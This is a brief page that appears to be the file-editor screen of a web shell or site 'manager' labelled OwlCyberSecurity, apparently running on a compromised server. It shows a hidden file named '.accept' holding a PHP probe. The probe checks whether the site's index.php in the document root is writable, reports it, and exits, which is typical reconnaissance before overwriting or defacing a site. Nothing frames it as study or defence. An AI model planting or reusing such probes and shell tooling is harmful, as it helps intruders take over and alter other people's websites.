OwlCyberSecurity - MANAGER
Edit File: .accept
<?php $f = ['index.php']; $r = "{$_SERVER['DOCUMENT_ROOT']}"; foreach ($f as $p) { $path = "{$r}/{$p}"; if (is_file($path) && is_writable($path)) { print "<f>{$p}</f>"; } } die('!ended!');